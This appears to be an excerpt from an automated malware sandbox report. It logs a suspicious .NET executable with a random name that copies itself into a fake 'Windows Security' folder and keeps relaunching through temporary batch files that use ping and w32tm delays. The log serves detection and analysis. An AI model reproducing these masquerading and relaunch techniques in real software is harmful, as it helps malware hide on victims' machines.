Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gzlPEas6c9.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RKW7EBQnZE.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KMG2LIZgv2.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eMBuAd62pF.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9ZQNubuJrx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NVJoNfH6eh.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x0UH1pL55G.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ip3Bhi35Fh.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4U0fcSq6WH.bat"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasapi32.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasman.dll
